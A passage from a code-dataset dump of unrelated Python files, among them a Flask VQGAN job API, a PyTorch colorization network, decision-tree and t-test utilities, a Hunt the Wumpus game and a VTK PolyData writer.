writer_b.add_scalar('Accuracy/test', temp_acc_test_list[-1])\n\n loss_train_list.append(np.mean(temp_loss_train_list))\n acc_train_list.append(np.mean(temp_acc_train_list))\n loss_test_list.append(np.mean(temp_loss_test_list))\n acc_test_list.append(np.mean(temp_acc_test_list))\n\n writer_e.add_scalar('Loss/train', np.mean(temp_loss_train_list), ephoc)\n writer_e.add_scalar('Accuracy/train', np.mean(temp_acc_train_list), ephoc)\n writer_e.add_scalar('Loss/test', np.mean(temp_loss_test_list), ephoc)\n writer_e.add_scalar('Accuracy/test', np.mean(temp_acc_test_list), ephoc)\n\n print(\"Ephoc {}: train_loss - {}, test_loss - {}, train_acc - {}, test_acc - {}\".format(ephoc,\n loss_train_list[-1],\n loss_test_list[-1],\n acc_train_list[-1],\n acc_test_list[-1]))\nwriter_b.flush()\nwriter_b.close()\nwriter_e.flush()\nwriter_e.close()\n","sub_path":"transfer_learningV2_cuda0.py","file_name":"transfer_learningV2_cuda0.py","file_ext":"py","file_size_in_byte":7852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"77945166","text":"from datetime import datetime\nimport uuid\n\nfrom flask import Blueprint, request, redirect, url_for\nfrom envcfg.raw import aws as aws_cfg\n\nfrom starks.modules.alimt.service import zh2en\nfrom starks.modules.vqgan.helper import get_random_style\nfrom starks.modules.vqgan.model.vqgan import VQGAN\nfrom starks.modules.vqgan.model.vqgan_job import VQGANJob\nfrom starks.utils.api import success, fail\nfrom starks.utils.s3 import sign_get_url\n\n\nbp = Blueprint(\"vqgan\", __name__, url_prefix=\"/api/v1\")\nAWS_BUCKET_NAME = aws_cfg.BUCKET_NAME\nMAX_PAGE_SIZE = 50\n\nVQGAN_IMAGE = \"413195515848.dkr.ecr.cn-northwest-1.amazonaws.com.cn/surreal-vqgan-clip:latest\", # noqa: FIXME\n\n\n@bp.route(\"/paint.list\")\ndef list_vqgans():\n page = request.args.get(\"page\", type=int, default=1)\n page_size = request.args.get(\"page_size\", type=int, default=10)\n page = max(1, page)\n page_size = min(page_size, MAX_PAGE_SIZE)\n vqgans = VQGAN.paginate(page, page_size)\n return success([e.marshal() for e in vqgans.items])\n\n\n@bp.route(\"/paint.get\")\ndef get_vqgan():\n id_ = request.args.get(\"id\")\n if id is None:\n return fail(error=\"Paint not found\", status=404)\n\n vqgan = VQGAN.query.get(id_)\n if vqgan is None:\n return fail(error=\"Paint not found\", status=404)\n return success(vqgan.marshal())\n\n\n@bp.route(\"/paint.preview\")\ndef preview_vqgan():\n id_ = request.args.get(\"id\", type=int)\n vqgan = VQGAN.get(id_)\n if vqgan is None:\n return fail(error=\"Job not found\", status=404)\n return redirect(\n sign_get_url(\n obj_key=vqgan.obj_key,\n bucket_name=vqgan.bucket_name,\n )\n )\n\n\n@bp.route(\"/paint.create\", methods=[\"POST\"])\ndef create_paint():\n payload = request.get_json()\n raw_text = payload.get(\"text\", None)\n if raw_text is None:\n return fail(error=\"text can not be empty\", status=400)\n\n raw_text = raw_text.strip()\n\n if len(raw_text) == 0 or len(raw_text) > 90:\n return fail(error=\"text too long\", status=400)\n\n text = zh2en(raw_text)\n today = datetime.now().strftime(\"%Y%m%d\")\n hex_ = uuid.uuid4().hex\n\n vqgan_job = VQGANJob.create(\n params={\n \"nonce\": hex_,\n \"date\": today,\n \"raw_text\": raw_text,\n \"text\": text,\n \"style\": get_random_style(),\n \"docker\": {\n \"image\": VQGAN_IMAGE,\n }\n }\n )\n return success(vqgan_job.marshal())\n\n\n@bp.route(\"/paint-job.report\", methods=[\"POST\"])\ndef report_job():\n payload = request.get_json()\n job_id = payload.get(\"job_id\", None)\n job_type = payload.get(\"task_type\", None)\n status = payload.get(\"status\", None)\n timestamp = payload.get(\"timestamp\", None)\n data = payload.get(\"data\", None)\n if job_type.lower() != \"vqgan\":\n return fail(error=\"Invalid job_type\")\n\n job = VQGANJob.get_by_id(job_id)\n if job is None:\n return fail(error=\"Job not found\", status=404)\n\n if status == \"started\":\n job.status = VQGANJob.STATUS_IN_PROGRESS\n job.started_at = datetime.fromtimestamp(int(timestamp/1000))\n job.save()\n return success({\"job_id\": job_id})\n\n if status == \"stopped\":\n job.status = VQGANJob.STATUS_ERROR\n job.set_result(is_success=False, error_message=data.get(\"message\"))\n job.ended_at = datetime.utcnow()\n job.save()\n return success({\"job_id\": job_id})\n\n if status == \"success\":\n job.status = VQGANJob.STATUS_SUCCESS\n job.set_result(is_success=True, data=data)\n job.ended_at = datetime.utcnow()\n job.save()\n\n vqgan = VQGAN.create(\n text=job.params[\"raw_text\"],\n bucket_name=AWS_BUCKET_NAME,\n obj_key=job.result.get(\"data\", {}).get(\"obj_key\")\n )\n\n return success({})\n\n return fail(error='Bad Request')\n\n\n@bp.route(\"/paint-job.get\")\ndef get_job():\n job_id = request.args.get(\"id\")\n job = VQGANJob.get_by_id(job_id)\n if job is None:\n return fail(error=\"Job not found\", status=404)\n return success({\n \"status\": job.status,\n \"result\": job.result,\n \"preview_url\": url_for(\n 'vqgan.get_job_preview', job_id=job_id, _external=True),\n })\n\n\n@bp.route(\"/paint-job.create\", methods=[\"POST\"])\ndef create_job():\n payload = request.get_json()\n raw_text = payload.get(\"text\", None)\n if raw_text is None:\n return fail(error=\"text can not be empty\", status=400)\n\n raw_text = raw_text.strip()\n\n if len(raw_text) == 0 or len(raw_text) > 90:\n return fail(error=\"text too long\", status=400)\n\n text = zh2en(raw_text)\n today = datetime.now().strftime(\"%Y%m%d\")\n hex_ = uuid.uuid4().hex\n\n vqgan_job = VQGANJob.create(\n params={\n \"nonce\": hex_,\n \"date\": today,\n \"raw_text\": raw_text,\n \"text\": text,\n \"style\": get_random_style(),\n \"docker\": {\n \"image\": VQGAN_IMAGE,\n }\n }\n )\n return success(vqgan_job.marshal())\n\n\n@bp.route(\"/paint-jobs.preview\")\ndef get_job_preview(job_id):\n job_id = request.args.get(\"job_id\", type=int)\n job = VQGANJob.get_by_id(job_id)\n if job is None:\n return fail(error=\"Job not found\", status=404)\n data = job.result.get(\"data\", {})\n return redirect(\n sign_get_url(\n obj_key=data.get(\"filekey\"),\n bucket_name=AWS_BUCKET_NAME,\n )\n )\n","sub_path":"starks/modules/vqgan/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"523387648","text":"from __future__ import division\nimport torch\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision import models\n\n# general libs\nimport numpy as np\nimport math\nfrom torch import optim\nimport warnings\nimport os\nfrom utils.utils import *\nimport torch\nprint('Propagation Network: initialising')\n\n\nclass Encoder(nn.Module):\n def __init__(self, opt):\n super(Encoder, self).__init__()\n self.opt = opt\n # clicks(2) & binary mask\n self.conv1_clicks = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=True) \n # previous round frame, ab space\n self.conv1_prev = nn.Conv2d(2, 64, kernel_size=7, stride=2, padding=3, bias=True)\n # grayscale\n self.conv1_gray = nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=True)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight.data, nonlinearity='relu')\n if m.bias is not None:\n nn.init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.kaiming_normal_(m.weight.data, nonlinearity='relu')\n m.bias.data.zero_()\n\n resnet = models.resnet50(pretrained=True)\n self.bn1 = resnet.bn1\n self.relu = resnet.relu # 1/2, 64\n self.maxpool = resnet.maxpool\n\n self.res2 = resnet.layer1 # 1/4, 256\n self.res3 = resnet.layer2 # 1/8, 512\n self.res4 = resnet.layer3 # 1/16, 1024\n self.res5 = resnet.layer4 # 1/32, 2048\n\n def forward(self, gray, clicks):\n x = self.conv1_gray(gray) + self.conv1_clicks(clicks)\n x = self.bn1(x)\n x = self.relu(x) # 1/2, 64\n x = self.maxpool(x) # 1/4, 64\n r2 = self.res2(x) # 1/4, 64\n r3 = self.res3(r2) # 1/8, 128 \n r4 = self.res4(r3) # 1/16, 256\n r5 = self.res5(r4) # 1/32, 512\n\n return r5, r4, r3, r2\n\n\nclass ResBlock(nn.Module):\n def __init__(self, indim, outdim=None):\n super(ResBlock, self).__init__()\n if outdim == None:\n outdim = indim\n if indim == outdim:\n self.downsample = None\n else:\n self.downsample = nn.Conv2d(indim, outdim, kernel_size=3, padding=1)\n\n self.conv1 = nn.Conv2d(indim, outdim, kernel_size=3, padding=1)\n self.conv2 = nn.Conv2d(outdim, outdim, kernel_size=3, padding=1)\n\n def forward(self, x):\n r = self.conv1(F.relu(x))\n r = self.conv2(F.relu(r))\n\n if self.downsample is not None:\n x = self.downsample(x)\n \n return x + r \n\n\nclass Refine(nn.Module):\n def __init__(self, inplanes, planes, scale_factor=2):\n super(Refine, self).__init__()\n self.ResFS = ResBlock(inplanes, planes)\n self.ResMM = ResBlock(planes, planes)\n self.scale_factor = scale_factor\n\n def forward(self, f, pm):\n s = self.ResFS(f)\n m = s + F.interpolate(pm, scale_factor=self.scale_factor, mode='bilinear')\n m = self.ResMM(m)\n return m\n\n\nclass Decoder(nn.Module):\n def __init__(self, mdim, opt):\n super(Decoder, self).__init__()\n self.opt = opt\n self.ResFM = ResBlock(2048, mdim)\n self.RF4 = Refine(1024, mdim) # 1/16 -> 1/8\n self.RF3 = Refine(512, mdim) # 1/8 -> 1/4\n self.RF2 = Refine(256, mdim) # 1/4 -> 1\n self.pred1 = nn.Conv2d(mdim, 529, kernel_size=(1,1), padding=(0, 0), stride=1)\n self.pred2 = nn.Conv2d(mdim, 2, kernel_size=(3,3), padding=(1,1), stride=1)\n self.tanh = nn.Tanh()\n \n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight.data, nonlinearity='relu')\n if m.bias is not None:\n nn.init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.kaiming_normal_(m.weight.data, nonlinearity='relu')\n m.bias.data.zero_()\n\n def forward(self, r5, r4, r3, r2):\n x = self.ResFM(r5)\n x = self.RF4(r4, x) # out: 1/16, 256\n x = self.RF3(r3, x) # out: 1/8, 256\n x = self.RF2(r2, x) # out: 1/4, 256\n x = self.pred2(F.relu(x))\n x = F.interpolate(x, scale_factor=4, mode='bilinear')\n out_reg = self.tanh(x)\n return out_reg\n\n\nclass HuberLoss(nn.Module):\n def __init__(self, delta=.01):\n super(HuberLoss, self).__init__()\n self.delta=delta\n\n def __call__(self, in0, in1):\n mask = torch.zeros_like(in0)\n mann = torch.abs(in0-in1)\n eucl = .5 * (mann**2)\n mask[...] = mann < self.delta\n\n loss = eucl*mask/self.delta + (mann-.5*self.delta)*(1-mask)\n # return torch.sum(loss,dim=1,keepdim=True)\n return torch.mean(loss)\n\n\nclass Pnet(nn.Module):\n def __init__(self, opt):\n super(Inet, self).__init__()\n mdim = 256\n self.Encoder = Encoder(opt) # inputs: ref: rf, rm / tar: tf, tm\n self.Decoder = Decoder(mdim, opt) # input: m5, r4, r3, r2 >> p\n self.opt = opt\n self.isTrain = opt.isTrain\n self.load_I = opt.load_I\n self.I_path = opt.I_path\n\n def forward(self, gray, clicks):\n #gray = torch.unsqueeze(gray, 0)\n #clicks = torch.unsqueeze(clicks, 0)\n #prev = torch.unsqueeze(prev, 0)\n tr5, tr4, tr3, tr2 = self.Encoder(gray, clicks)\n fake_ab = self.Decoder(tr5, tr4, tr3, tr2)\n\n return fake_ab\n\n # load and print networks; create schedulers\n def setup(self, opt):\n if self.isTrain:\n self.optimizer = optim.Adam(self.parameters(), lr = opt.lr, betas=(opt.beta1, 0.999), weight_decay=opt.weight_decay) \n self.criterion = HuberLoss(delta=1. / opt.ab_norm)\n \n if self.load_I:\n # self.load_state_dict(torch.load(self.I_path, map_location='cuda:'+str(opt.gpu_ids)).state_dict())\n self.load_state_dict(torch.load(self.I_path))\n print('[Propagation net] loading Pnet sccesses')\n \n def calc_loss(self, real, fake):\n self.fake = fake\n self.real = real\n loss = self.criterion(self.fake, self.real)\n\n return loss","sub_path":"models/.ipynb_checkpoints/propagation_net_v2-checkpoint.py","file_name":"propagation_net_v2-checkpoint.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"602399497","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 16 13:35:35 2014\n\n@author: liorf\n\"\"\"\n\nfrom collections import Counter\nfrom math import log, sqrt\n\ndef entropy(labels):\n '''Calculate Shannon entropy for set of labels. \n Note that this works even for non-binary labels.\n This is useful for decision trees.\n \n Returns a float from 0.0 to 1.0 \n '''\n counts= Counter(labels)\n freqs= [float(count)/len(labels) for (value, count) in counts.most_common()]\n nonzero_freqs= [f for f in freqs if f > 0]\n if len(nonzero_freqs) <= 1:\n return 0.0 #edge case\n return sum([-log(f, 2)*f for f in nonzero_freqs])\n\n\ndef information_gain(old_labels, feature_values):\n '''Calculate information gain by splitting old_labels according to feature_values\n Note that this works for nominal features as well as binary (but it tends to prefer features with many values. there is a correction known as information gain ratio, but it is beyond the scope of the course)\n \n Returns a float\n '''\n current_entropy= entropy(old_labels)\n \n conditional_entropy= 0.0\n for value in frozenset(feature_values):\n indices_for_value= [i for (i,v) in enumerate(feature_values) if v==value]\n value_probability= float(len(indices_for_value))/len(feature_values)\n \n conditional_labels= [label for (i, label) in enumerate(old_labels) if i in indices_for_value]\n conditional_entropy+= value_probability*entropy(conditional_labels)\n \n return current_entropy - conditional_entropy\n \ndef l2_distance(example1, example2):\n '''Calculate distance between two examples based on L2-Norm (euclidean distance)\n Note that both examples must be lists of the same length!\n \n Returns a float representing the distance.\n '''\n if len(example1)!=len(example2):\n raise ValueError('cannot calculate distance on vectors of different dimensions: ' + str(len(example1)), str(len(example2)))\n return sqrt(sum([(v1-v2)**2 for (v1,v2) in zip(example1,example2)]))\n \nSIGNIFICANCE_THRESHOLD= 0.05\ndef student_paired_t_test(original_measurements, measurements_after_alteration):\n '''This is the paired T-test (for repeated measurements):\n Given two sets of measurements on the SAME data points (folds) before and after some change (In our case, before and after the local search step),\n Checks whether or not they come from the same distribution. \n \n This T-test assumes the measurements come from normal distributions (if you want, you can use the Mann-Whitney U test (scipy.stats.mannwhitneyu) to check this assumption)\n \n Returns: the probability that the measurements came from the same distribution.\n Note that since we know if the new measurements are better or not, we only want to know the probability \n For the sake of this assignment, we will say the results are SIGNIFICANT (they truly are different) if this value is less than 0.05.\n Also returns: is_significant = binary value stating whether the result is statically significant. is_better = binary value stating whether the new measurements are better than the old ones.\n '''\n try:\n from scipy.stats import ttest_rel\n except:\n raise Exception('You must either install scipy, or find an online implementation of paired T-test')\n test_value, probability= ttest_rel(original_measurements, measurements_after_alteration)\n is_significant= probability/2 < SIGNIFICANCE_THRESHOLD\n is_better= sum(original_measurements) < sum(measurements_after_alteration) #should actually compare averages, but there's no need since it's the same number of measurments.\n return probability/2 if is_better else 1-probability/2, is_significant, is_better","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"427945026","text":"n = int(input())\r\nst = str(bin(n)).replace(\"0b\", \"\")\r\nmax = 0\r\ncount = 0\r\nfor i in st:\r\n if i == '1':\r\n count += 1\r\n if count > max:\r\n max = count\r\n else:\r\n count = 0\r\nprint(max)\r\n","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"28422211","text":"#Hunt the Wumpus\r\n#From a vintage BASIC game program\r\n#by CREATIVE COMPUTING MORRISTOWN, NEW JERSEY\r\n#Rewritten in Python by Gordon Reeder\r\n# Python 3.4\r\n# ** To do **\r\n# - Make connections within cave random. So that no two caves are the same.\r\n\r\nimport random\r\nimport sys\r\n\r\ndef show_instructions():\r\n print (\"\"\"\r\n WELCOME TO 'HUNT THE WUMPUS'\r\n THE WUMPUS LIVES IN A CAVE OF 16 ROOMS.\r\n 13 14 15 16\r\n 9 10 11 12\r\n 5 6 7 8\r\n 1 2 3 4\r\n \r\n WARNINGS:\r\n WHEN YOU ARE ONE ROOM AWAY FROM WUMPUS OR A HAZARD,\r\n THE COMPUTER SAYS:\r\n WUMPUS: 'STENCH'\r\n PIT : 'BREEZE'\r\n \"\"\")\r\n\r\n\r\nclass Room:\r\n \"\"\"Defines a room. \r\n A room has a name (or number),\r\n a list of other rooms that it connects to.\r\n and a description. \r\n How these rooms are built into something larger \r\n (cave, dungeon, skyscraper) is up to you.\r\n \"\"\"\r\n\r\n def __init__(self, **kwargs):\r\n self.number = 0\r\n self.name =''\r\n self.connects_to = [] #These are NOT objects\r\n self.description = \"\"\r\n for key, value in kwargs.items():\r\n setattr(self, key, value)\r\n def __str__(self):\r\n return str(self.number)\r\n\r\n def remove_connect(self, arg_connect):\r\n if arg_connect in self.connects_to:\r\n self.connects_to.remove(arg_connects)\r\n\r\n def add_connect(self, arg_connect):\r\n if arg_connect not in self.connects_to:\r\n self.connects_to.append(arg_connect)\r\n\r\n def is_valid_connect(self, arg_connect):\r\n return arg_connect in self.connects_to\r\n\r\n def get_number_of_connects(self):\r\n return len(self.connects_to)\r\n\r\n def get_connects(self):\r\n return self.connects_to\r\n\r\n def describe(self):\r\n if len(self.description) > 0:\r\n print(self.description)\r\n else:\r\n print(\"You are in room {}.\\nPassages lead to {}\".format(self.number, self.connects_to))\r\n \r\n\r\nclass Thing:\r\n \"\"\"Defines the things that are in the cave.\r\n That is the Wumpus, Player, pits and gold.\r\n \"\"\"\r\n\r\n def __init__(self, **kwargs):\r\n self.location = 0 # this is a room object\r\n for key, value in kwargs.items():\r\n setattr(self, key, value)\r\n\r\n def move(self, a_new_location):\r\n if a_new_location.number in self.location.connects_to or a_new_location == self.location:\r\n self.location = a_new_location\r\n return True\r\n else:\r\n return False\r\n\r\n def validate_move(self, a_new_location):\r\n return a_new_location.number in self.location.connects_to or a_new_location == self.location\r\n \r\n def get_location(self):\r\n return self.location.number\r\n\r\n def wakeup(self, a_cave):\r\n if random.randint(0, 3): # P=.75 that we will move.\r\n self.location = a_cave[random.choice(self.location.connects_to) -1]\r\n \r\n def is_hit(self, a_room):\r\n return self.location == a_room\r\n\r\ndef create_things(a_cave):\r\n # a_cave = room, 0 - 15\r\n Things=[]\r\n Things.append(Thing(location = a_cave[0])) # Player berada di kolom 1.1\r\n checker = False\r\n\r\n while checker == False:\r\n Samples = random.sample(a_cave, 5) #Wumpus, Pit1, Pit2, Pit3, Gold\r\n Pits = [Samples[1], Samples[2], Samples[3]]\r\n forbiddenRoom1 = [a_cave[1], a_cave[4]]\r\n forbiddenRoom2 = [a_cave[2], a_cave[7]]\r\n forbiddenRoom3 = [a_cave[13], a_cave[8]]\r\n forbiddenRoom4 = [a_cave[11], a_cave[14]]\r\n \r\n checker = True\r\n \r\n if Samples[0] == a_cave[0]:\r\n checker = False\r\n if Samples[1] == a_cave[0] or Samples[2] == a_cave[0] or Samples[3] == a_cave[0]:\r\n checker = False\r\n if (len(set(forbiddenRoom1) - set(Pits)) == 0):\r\n checker = False\r\n if (len(set(forbiddenRoom2) - set(Pits)) == 0):\r\n checker = False\r\n if (len(set(forbiddenRoom3) - set(Pits)) == 0):\r\n checker = False\r\n\r\n for room in Samples:\r\n Things.append(Thing(location = room))\r\n\r\n return Things\r\n\r\ndef create_cave():\r\n # First create a list of all the rooms.\r\n for number in range(16):\r\n Cave.append(Room(number = number +1))\r\n\r\n # Then stich them together.\r\n for idx, room in enumerate(Cave):\r\n #connect to room to the right\r\n if idx != 0:\r\n if idx != 4:\r\n if idx != 8:\r\n if idx != 12:\r\n room.add_connect(Cave[idx -1].number)\r\n if idx == 15:\r\n room.add_connect(Cave[11].number)\r\n elif idx == 3:\r\n ''\r\n elif idx == 7:\r\n ''\r\n elif idx == 11:\r\n ''\r\n else: \r\n room.add_connect(Cave[idx +1].number) \r\n\r\n #connect to room up or down\r\n if idx == 0:\r\n room.add_connect(5)\r\n if idx == 1:\r\n room.add_connect(6)\r\n if idx == 2:\r\n room.add_connect(7)\r\n if idx == 3:\r\n room.add_connect(8)\r\n if idx == 4:\r\n room.add_connect(1)\r\n room.add_connect(9)\r\n if idx == 5:\r\n room.add_connect(2)\r\n room.add_connect(10)\r\n if idx == 6:\r\n room.add_connect(3)\r\n room.add_connect(11)\r\n if idx == 7:\r\n room.add_connect(4)\r\n room.add_connect(12)\r\n if idx == 8:\r\n room.add_connect(5)\r\n room.add_connect(13)\r\n if idx == 9:\r\n room.add_connect(6)\r\n room.add_connect(14)\r\n if idx == 10:\r\n room.add_connect(7)\r\n room.add_connect(15)\r\n if idx == 11:\r\n room.add_connect(8)\r\n room.add_connect(16)\r\n if idx == 12:\r\n room.add_connect(9)\r\n if idx == 13:\r\n room.add_connect(10)\r\n if idx == 14:\r\n room.add_connect(11)\r\n\r\n# ============ BEGIN HERE ===========\r\n\r\nCave = []\r\ncreate_cave()\r\n# Make player, wumpus, pits and put into cave.\r\n\r\nPlayer, Wumpus, Pit1, Pit2, Pit3, Gold = create_things(Cave)\r\n\r\nArrows = 5\r\n\r\n# Now play the game\r\n\r\nprint(\"\"\"\\n \r\n13 14 15 16\r\n9 10 11 12\r\n5 6 7 8\r\n1 2 3 4\r\n \\n\r\n Welcome to the cave, Great White Hunter.\r\n You are hunting the Wumpus.\r\n On any turn you can move or shoot.\r\n Commands are entered in the form of ACTION LOCATION\r\n IE: 'SHOOT 12' or 'MOVE 8'\r\n type 'HELP' for instructions.\r\n 'QUIT' to end the game.\r\n \"\"\")\r\n\r\n\r\nwhile True:\r\n Player.location.describe()\r\n #Check each for hazards.\r\n for room in Player.location.connects_to:\r\n if Wumpus.location.number == room:\r\n print(\"Stench\")\r\n if Pit1.location.number == room or Pit2.location.number == room:\r\n print(\"Breeze\")\r\n \r\n if Gold.location.number == room:\r\n print(\"Gold Found. Press T to take the gold\")\r\n raw_command = input(\"\\n> \")\r\n command_list = raw_command.split(' ')\r\n command = command_list[0].upper()\r\n if len(command_list) > 1:\r\n try:\r\n move = Cave[int(command_list[1]) -1]\r\n except:\r\n print(\"\\n **What??\")\r\n continue\r\n else:\r\n move = Player.location\r\n if command == 'TAKE' or command == 'T':\r\n # TODO : TAKE GOLD ACTION\r\n continue\r\n if command == 'HELP' or command == 'H':\r\n show_instructions()\r\n continue\r\n\r\n elif command == 'QUIT' or command == 'Q':\r\n print(\"\\nOK, Bye.\")\r\n sys.exit()\r\n\r\n elif command == 'MOVE' or command == 'M':\r\n if Player.move(move):\r\n if Player.location == Wumpus.location:\r\n print(\"... OOPS! BUMPED A WUMPUS!\")\r\n else:\r\n print(\"\\n **You can't get there from here\")\r\n continue\r\n\r\n elif command == 'SHOOT' or command == 'S':\r\n if Player.validate_move(move):\r\n print(\"\\n-Twang-\") \r\n if Wumpus.location == move:\r\n print(\"\\n Good Shooting!! You hit the Wumpus. \\n Wumpi will have their revenge.\\n\")\r\n sys.exit()\r\n else:\r\n print(\"\\n** Stop trying to shoot through walls.\")\r\n\r\n Wumpus.wakeup(Cave)\r\n Arrows -= 1\r\n if Arrows == 0:\r\n print(\"\\n You are out of arrows\\n Better luck next time\\n\")\r\n sys.exit()\r\n \r\n else:\r\n print(\"\\n **COMMAND YANG TERSEDIA : \\n 1. MOVE {ANGKA} \\n 2. SHOOT {ANGKA} \\n 3. HELP \\n 4. QUIT\")\r\n continue\r\n\r\n \r\n # By now the player has moved. See what happened.\r\n # Handle problems with pits, bats and wumpus.\r\n\r\n if Player.location == Wumpus.location:\r\n print(\"Wumpus Memakanmu\\n\")\r\n sys.exit() \r\n\r\n elif Player.location == Pit1.location or Player.location == Pit2.location or Player.location == Pit3.location:\r\n print(\"Anda masuk kedalam PIT\\n\")\r\n sys.exit()\r\n\r\n else: # Keep playing\r\n pass\r\n","sub_path":"wumpus.py","file_name":"wumpus.py","file_ext":"py","file_size_in_byte":9006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"322795320","text":"\"\"\" VTK file driver based on documentation from\nhttp://vtk.org/VTK/img/file-formats.pdf \"\"\"\n\nimport sys\nimport operator\nfrom xml.etree import ElementTree as ET\nfrom xml.dom import minidom\nfrom functools import reduce\n\ndef mp2vtp(mp_list, f, **kwargs):\n \"\"\" Write a list of Multipoint instances to a serial VTK PolyData (.vtp)\n file.\n\n kwargs are:\n\n *vbyteorder* : 'LittleEndian' or 'BigEndian' to force a byte\n order other than the native order\n\n *write_pointdata* : {bool}, default True, to write point attributes\n \"\"\"\n\n vtype = 'PolyData'\n vbyteorder = kwargs.get('byte_order', 'undef')\n if vbyteorder == 'undef':\n if sys.byteorder == 'little':\n vbyteorder = 'LittleEndian'\n else:\n vbyteorder = 'BigEndian'\n if vbyteorder not in ('LittleEndian', 'BigEndian'):\n raise Exception(\"vbyteorder must be 'LittleEndian' or 'BigEndian'\")\n write_pointdata = kwargs.get('write_pointdata', True)\n\n vversion = str(kwargs.get('version', 0.1))\n\n xdoc = ET.Element('VTKFile', attrib={'type':vtype,\n 'version':vversion,\n 'byte_order':vbyteorder})\n\n xugrid = ET.SubElement(xdoc, vtype)\n\n if hasattr(mp_list, \"_geotype\") and mp_list._geotype == \"Multipoint\":\n mp_list = [mp_list]\n\n for mp in mp_list:\n\n xpiece = ET.Element('Piece', attrib={'NumberOfPoints':str(len(mp)),\n 'NumberOfVerts':str(len(mp))})\n xugrid.append(xpiece)\n\n # Point coordinates\n xpts = ET.Element('Points')\n xdarray = ET.Element('DataArray',\n attrib={'NumberOfComponents':'{0}'.format(mp.rank),\n 'type':'Float32',\n 'format':'ascii'})\n xdarray.text = reduce(lambda a,b: str(a)+' '+str(b), # Concat points\n map(lambda pt: # Form points\n reduce(lambda a,b: str(a)+' '+str(b), pt),\n mp)) # Concat coords\n\n xpts.append(xdarray)\n xpiece.append(xpts)\n\n # Point data\n if False in (a is None for a in mp.data) and write_pointdata:\n if hasattr(mp.data, 'keys'):\n datakeys = mp.data.keys()\n datavals = mp.data.values()\n else:\n datakeys = ['point_data']\n datavals = [mp.data]\n\n xptdata = ET.Element('PointData')\n for key, vals in zip(datakeys, datavals):\n if isinstance(vals[0], int):\n dtype = 'Int32'\n elif isinstance(vals[0], float):\n dtype = 'Float32'\n else:\n dtype = 'String'\n xdarray = ET.Element('DataArray', attrib={'type':dtype,\n 'format':'ascii',\n 'Name':str(key)})\n xdarray.text = reduce(lambda a,b: str(a)+' '+str(b), vals)\n xptdata.append(xdarray)\n\n xpiece.append(xptdata)\n\n # Cell data\n xcell = ET.Element('Verts')\n connectivity = ET.Element('DataArray', attrib={'type':'Int32',\n 'Name':'connectivity',\n 'format':'ascii'})\n connectivity.text = reduce(operator.add,\n [str(a)+' ' for a in range(len(mp))])\n\n offsets = ET.Element('DataArray', attrib={'type':'Int32',\n 'Name':'offsets',\n 'format':'ascii'})\n #offsets.text = str(len(mp))\n offsets.text = reduce(operator.add,\n [str(a+1)+' ' for a in range(len(mp))])\n\n\n xcell.append(connectivity)\n xcell.append(offsets)\n xpiece.append(xcell)\n\n pretty_xml = minidom.parseString(ET.tostring(xdoc)).toprettyxml()\n\n f.write(pretty_xml)\n return\n\n","sub_path":"karta/vector/vtk.py","file_name":"vtk.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"284833696","text":"\nn = int(input())\nl = map(int,input().split())\nls = list(l)\ndict = {}\nfor i in ls:\n \n \n if i in dict:\n dict[i] += 1\n else:\n \n dict[i] = 1\nfor key,val in dict.items():\n \n if val == 1:\n \n print(key,end=' ')\n \n","sub_path":"uniquenum.py","file_name":"uniquenum.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"548312998","text":"# this is just sample code\nprint(\"this string of words\")\napple = None\nbanana = None\napple = 1\nprint(str(apple))\nbanana = 300\ncoconut = 'some words'\ndragon_fruit = [ 8 , 9 , 10 , 11 , 12 ]\ncrazy_list = [ 1 , 2 , 'tree bark' ]\nresult = 1 + 2\nprint(str(result))\nif True:\n\tprint(\"this is a 1 line if statement\")\n\nif 1 == 1:\n\tprint(\"this should print\")\n\nprint(\"there should be nothing between this line\")\nif 1 == 2:\n\tprint(\"it should not print this\")\n\nif 1 == 2:\n\tprint(\"it should ! print this end if\")\n\nprint(\"and this line\")\ncircle = [ -1 , 0 , 1 , 2 , 3 ]\nfor index in circle:\n\tprint(str(index))\n\n# this is a comment\ndef test(item):\n\tprint(str(item))\n\nother = 'it works'\ntest(other)\nimport alternate\nfrom library import test\ntest.test_function()\ntest.test_function()\ncrazy_list = [ 1 , 2 , 'tree bark' ]\nsequence = [ 0 , 1 , 2 ]\nfor item in sequence:\n\tprint(crazy_list[item])\n\nimport numpy as numb_pie\narray = [ 2 , 3 , 4 ]\nprint(\"array is \" + str(array))\nprint(\"use array of numb pie on \" + str(array))\noutput = numb_pie.array(array)\nprint(\"output of array of numb pie is \" + str(output))\n\n\ndef fibonacci(number):\n\tif number == 0:\n\t\treturn 0\n\t\n\tif number == 1:\n\t\treturn 1\n\t\n\tanswer_1 = fibonacci(number - 1)\n\tanswer_2 = fibonacci(number - 2)\n\treturn answer_1 + answer_2\n\noutput = fibonacci(0)\nprint(\"step 1: output = \" + str(output))\noutput = fibonacci(1)\nprint(\"step 2: output = \" + str(output))\noutput = fibonacci(2)\nprint(\"step 3: output = 